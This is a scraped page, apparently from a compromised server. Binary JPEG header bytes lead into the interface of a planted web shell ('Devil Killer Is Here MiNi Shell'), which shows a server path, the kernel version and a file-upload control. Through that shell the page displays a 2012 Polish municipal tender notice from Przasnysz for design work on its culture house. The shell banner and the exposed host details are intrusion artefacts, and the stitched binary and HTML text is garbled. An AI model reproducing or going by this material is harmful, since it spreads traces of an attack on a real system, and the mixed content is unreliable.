JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120510/104455-N-2012.html

<p class="kh_header"><b>Przasnysz: Opracowanie dokumentacji projektowej  przebudowy  i nadbudowy budynku  Miejskiego Domu Kultury w Przasnyszu</b><br>
<b>Numer ogłoszenia: 104455 - 2012; data zamieszczenia: 10.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Przasnysz , ul. Jana Kilińskiego 2, 06-300 Przasnysz, woj. mazowieckie, tel. 029 7564900, faks 029 7564939.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przasnysz.um.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej  przebudowy  i nadbudowy budynku  Miejskiego Domu Kultury w Przasnyszu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - zwanym dalej Opracowaniem  jest wykonanie wielobranżowej dokumentacji projektowej  przebudowy i nadbudowy istniejącego budynku Miejskiego Domu Kultury w Przasnyszu (dalej MDK). 
Nadbudowa  budynku ma na celu pozyskanie niezbędnej przestrzeni nad sceną do umieszczenia urządzeń mechanizacji górnej w tym sztankietów i mostów świetlnych.  Przebudowa budynku ma na celu przystosowanie pomieszczeń wewnętrznych  do nowego układu funkcjonalnego. 
Dokumentacja projektowa obejmuje: 
1)przebudowę  sali  widowiskowo-kinowej  z modernizacją sceny i wyposażeniem w urządzenia mechanizacji górnej (sztankiety, mosty świetlne) , mechanizm kurtynowy, nagłośnienie, urządzenia technologii systemu łączności inspicjenta  i technologii kinotechniki.
2)nadbudowę budynku nad sceną
3)przebudowę pomieszczeń wewnętrznych w celu uzyskania kieszeni scenicznych
4)przebudowę widowni z wymianą foteli
5)przebudowę pozostałych pomieszczeń w standardzie wymaganym dla: 
-pracowni plastycznej
-pracowni do nauki gry na instrumentach
-pomieszczenia do przeprowadzania prób teatralnych
-garderoby
-studia nagrań
-pomieszczeń wielofunkcyjnych, administracyjnych i gospodarczych
-toalet
W projekcie należy uwzględnić rozwiązania bez barier architektonicznych  oraz dostosowanie obiektu do potrzeb osób z różnym rodzajem niepełnosprawności. 
1. Informacje ogólne o  obiekcie. 
Budynek MDK został wybudowany w latach 30 ubiegłego wieku. Obiekt jest usytuowany w strefie ochrony konserwatorskiej. 
Budynek  ma  powierzchnię  zabudowy 756,07m2, powierzchnię użytkową 1373,3 m2 , na którą  składa się  cztery kondygnacje zagospodarowane w następujący sposób : 
1)podziemie ( kotłownia, pomieszczenia techniczne)
2)parter  (pomieszczenia ogniska muzycznego, pomieszczenia po byłej kawiarni z zapleczem, zespół wejściowy do kina i pomieszczenia po byłej bibliotece)
3)I piętro ( pomieszczenia biurowe, sala widowiskowa, sala kinowa, pracownie, galerie)
4)II piętro ( Kabina kinotechniczna) 

2.Zakres opracowania: 
1). Czynności  poprzedzające etap projektowania.   
Przed przystąpieniem do  projektowania Wykonawca jest zobowiązany w ramach niniejszego zamówienia i bez dodatkowego wynagrodzenia  wykonać:
a)  ekspertyzę techniczną  budynku  w tym również  ekspertyzę  fundamentów, a jej wyniki przedstawić Zamawiającemu . Ocenę stanu technicznego należy sporządzić pod kątem : 
-możliwości nadbudowy części kondygnacji i zmiany  układu dachu 
-możliwości zmian konstrukcyjnych wewnątrz budynku w celu dostosowania pomieszczeń do nowych funkcji. 
-osuszenia i adaptacji  pomieszczeń w podziemiu 
b)wykonanie badań geologicznych podłoża gruntowego wokół budynku 
c)audyt  akustyczny sali widowiskowo -kinowej  wraz ze sporządzeniem wytycznych do projektu architektury (projekt akustyczny)

2)Zakres projektu :

a) mapa do celów projektowych  w granicach geodezyjnych działki nr 858 
b)przygotowanie koncepcji rozwiązań  projektowych z wizualizacją  oraz  uzyskanie akceptacji Zamawiającego.  
c)projekt zagospodarowania terenu (6 egz) 
d)projekt budowlany (6 egz) 
-architektura 
-konstrukcja
-przyłącze do sieci wodociągowej z uzyskaniem warunków przyłączenia. 
- drenażu  z włączeniem do sieci kanalizacji deszczowej
e)projekty  wykonawcze  (4 egz.) 
-konstrukcji
a)instalacji : wodna ;  kanalizacyjna (z przebudową włączenia do studzienki przed budynkiem) , centralnego ogrzewania (istniejące przyłącze do sieci cieplnej) ;  elektrycznej, odgromowej ; wentylacji i  klimatyzacji instalacji systemów specjalnych  ( Internet, monitoring wizyjny wewnętrzny i zewnętrzny, system pożarowy, antywłamaniowy)   
f)projekt wzmocnienia i/lub osuszenia fundamentów  w zakresie wynikającym z  ekspertyzy technicznej  
g)Informacja w zakresie  bezpieczeństwa i ochrony zdrowia. 
h)przedmiary robót  /oddzielnie dla każdej branży/ - 2 egz 
i)specyfikacje techniczne wykonania i odbioru robót - 1 egz 
j)kosztorysy inwestorskie /oddzielne dla każdej branży/ 1 egz
k)uzyskania niezbędnych warunków technicznych,  uzgodnień i sprawdzeń w zakresie niezbędnym do uzyskania pozwolenia na budowę. 
Uwaga: 
1)  Konieczne uzgodnienie dokumentacji projektowej z  konserwatorem zabytków. 
2)  Uzyskanie  Decyzji o ustaleniu lokalizacji inwestycji celu publicznego  leży po stronie zamawiającego.            
l) jednokrotną aktualizację kosztorysów inwestorskich w ciągu dwóch lat od daty przekazania  Opracowania Zamawiającemu. 
m)wizualizacja obiektu na nośnikach cyfrowych (CD, DVD) - w związku z potrzebami promocji działania w mediach.
n)wyposażenie obiektu - instrukcja bezpieczeństwa pożarowego i plan ewakuacji w czasie imprez masowych,  zestawienie podręcznego sprzętu gaśniczego, oznakowanie dróg ewakuacyjnych, wyciąg z instrukcji bezpieczeństwa pożarowego

Wymagania Zamawiającego dotyczące  opracowania: 

(1)W przyjętych rozwiązaniach projektowych należy uwzględnić :
a)obniżenie kosztów eksploatacji obiektu poprzez stosowanie  energooszczędnych urządzeń,  
b) bezpieczeństwo korzystania z obiektu;
d)ochronę przed hałasem i komfort  akustyczny.
(2)Wszystkie części  dokumentacji będą wzajemnie skoordynowane technicznie i kompletne z punktu widzenia celu, któremu mają służyć. 
(3)Dokumentacja projektowa zawierać będzie wymagane potwierdzenia sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów, a także spis opracowań i dokumentacji składających się na komplet przedmiotu zamówienia. 
(4)Wykonawca złoży  oświadczenie  podpisane przez projektantów odpowiedzialnych za spełnienie tych wymagań, że dokumentacja projektowa została wykonana zgodnie z umową, obowiązującymi normami i w stanie kompletnym z punku widzenia celu, któremu ma służyć. 
(5)Opracowanie  będzie wykonane  w wersji papierowej w ilości egzemplarzy wykazanych powyżej  oraz w wersji elektronicznej zapisanej w formacie PDF.  
(6)Dokumentacja projektowa powinna być sporządzona zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z dnia 16 września 2004r. z późn. zm.).

Inne szczególne warunki, którym podlega realizacja zamówienia:
(1)Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7.7.1994 r. Prawo budowlane (t. jedn. Dz. U. z 2010r Nr 243, poz. 1623.), ustawie . ustawie z dnia 29.1.2004 Prawo zamówień publicznych  t. j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.)  i  Kodeks cywilny (Dz. U.1964r Nr 16 poz. 93 ze zm.)  oraz aktami wykonawczymi do tych ustaw.
(2)Wykonawca musi zapewnić wykonanie usługi  zgodnie z prawem polskim, w tym w  szczególności z przepisami dotyczącymi samodzielnych funkcji technicznych w budownictwie. 

Podwykonawstwo :  
Zamawiający dopuszcza  realizację zamówienia przy udziale podwykonawców . Jeżeli  w realizacji zamówienia będą brały udział podmioty inne  ( podwykonawcy) ,  Zamawiający  żąda wskazania przez Wykonawcę w ofercie ( Formularzu Oferty) części  zamówienia (zakresu  usług), których wykonanie Wykonawca powierzy podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.10.00-3, 71.35.40.00-4, 71.33.20.00-4, 71.33.50.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga sie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie
Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   załączony  do  SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby wykonawca wykazał, że w okresie ostatnich trzech lat upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył) co najmniej dwa opracowania projektowe wielobranżowe  , o wartości minimum 150 000 zł każde,  porównywalne z przedmiotem zamówienia. 
Przez porównywalne opracowania rozumie się  dokumentację wielobranżową na   budowę i/lub  przebudowę i/lub rozbudowę budynku  wielofunkcyjnego  o powierzchni całkowitej minimum 1000 m2  z salą widowiskową i /lub kinową lub  teatralną.    
   
Uwaga: W przypadku umów o wykonanie usług  projektowych zawartych w walutach innych niż PLN, należy ich wartość przeliczyć na PLN wg średniego kursu Narodowego Banku Polskiego  z dnia podpisania umowy  podając w wykazie usług datę podpisania umowy i kurs waluty.

Wykonawcy wspólnie ubiegający się o udzielenie zmówienia powyższy warunek spełniają łącznie.   
Określenie  [łącznie]  należy interpretować w ten  sposób, że każdy z wykonawców  może wykazać się realizacją  wymaganych usług, a wykazanie się tą umiejętnością przez jednego z wykonawców zwalnia pozostałych z tego obowiązku. Sformułowania [łącznie] nie należy utożsamiać  z sumowaniem  wartości drobnych zamówień nie przekraczających minimalnego  progu określonego w opisie warunku  
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy  pzp  oraz   wykazu usług  (na Formularzu 3) , zawierającego  opracowania  odpowiadające  wymaganiom Zamawiającego przedstawionym w opisie warunku.  
Wykonawca może polegać na wiedzy i doświadczeniu  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  W przypadku, gdy Wykonawca wykazując spełnianie warunku polega na wiedzy i doświadczeniu innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie
Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   załączony  do  SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował  wykwalifikowaną kadrą, posiadającą wymagane polskim prawem uprawnienia  budowlane do obsadzenia stanowisk:
(1)projektant branży architektonicznej -  co najmniej 1 osoba:
 Minimalne wymagania:
-Uprawnienia budowlane do projektowania w specjalności architektonicznej  bez ograniczeń;
-Doświadczenie w projektowaniu- jest autorem  co najmniej jednego  projektu obiektu wielofunkcyjnego o kategorii złożoności robót budowlanych IV lub wyższej ( kategorie wg pkt 1.4 oraz tabeli 2 załącznika do Rozporządzenia ministra infrastruktury z dnia 18 maja 2004r. Dz. U. nr 130z 2004r., poz. 1389)

(2) projektant branży konstrukcyjno- budowlanej - co najmniej 1 osoba
 Minimalne wymagania:
-Uprawnienia budowlane do projektowania  w specjalności  konstrukcyjno-budowlanej bez ograniczeń, 
-Doświadczenie w projektowaniu - jest autorem co najmniej jednego projektu  obiektu wielofunkcyjnego o kategorii złożoności robót budowlanych IV lub wyższej ( kategorie wg pkt 1.4 oraz tabeli 2 załącznika do Rozporządzenia ministra infrastruktury z dnia 18 maja 2004r. Dz.U. nr 130z 2004r., poz. 1389) 
(3)projektant branży instalacyjnej w zakresie sieci i instalacji elektrycznych 
 i elektroenergetycznych - co najmniej 1 osoba
 Minimalne wymagania:
-uprawnienia budowlane do projektowania  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
(4)projektant/projektanci branży instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych. - minimum 1 osoba
 Minimalne wymagania: uprawnienia budowlane umożliwiające projektowanie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnycych.  Zamawiający wymaga, aby w ramach tego warunku wykonawca dysponował osobą lub zespołem osób, których zakres uprawnień projektowych  będzie się uzupełniać tak, aby łącznie posiadli zdolność prawną do wykonania dokumentacji projektowej  wszystkich wymienionych wyżej  instalacji branżowych. 
 Zamawiający dopuszcza  wskazywanie tej samej osoby na więcej niż jedno stanowisko, aczkolwiek, w takim przypadku osoba ta winna posiadać co najmniej minimalne kwalifikacje przewidywane dla każdego ze stanowisk, na które jest wskazana.
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych    oraz wykazu osób wskazanych przez Wykonawcę do kierowania  wykonaniem zamówienia(Formularz 3- potencjał kadrowy) 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych
podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków  na zasadach określonych w art. 26 ust. 2b ustawy Pzp. W  przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia  innych podmiotów , zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  tymi osobami, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające także listę osób, które zostaną przez ten podmiot udostępnione.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie
Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   załączony  do  SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą należy złożyć: 

a)Pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy (oryginał lub kopia potwierdzona za zgodność z  oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych  wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych  wraz z ofertą. 
b)Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy. Warunki wprowadzenia zmian są następujące: 
a)zmiana terminu realizacji przedmiotu umowy  będzie możliwa w przypadku wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia, w tym zwłaszcza:  
- przedłużające się procedury uzyskania decyzji administracyjnych i uzgodnień branżowych,
- uzyskania od gestorów mediów warunków technicznych przebudowy urządzeń infrastruktury technicznej lub warunków przyłączenia obiektu projektowanego  do istniejących sieci
- wprowadzenia przez Zamawiającego więcej niż dwóch korekt na etapie uzgadniania koncepcji dokumentacji projektowej.
W razie zaistnienia istotnej zmiany okoliczności powodujacej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa w poprzednim zdaniu, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania częsci umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przasnysz.um.gov.pl ( bip)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przasnysz  ul. J. Kilińskiego 2 , 06-300 Przasnysz.</p>
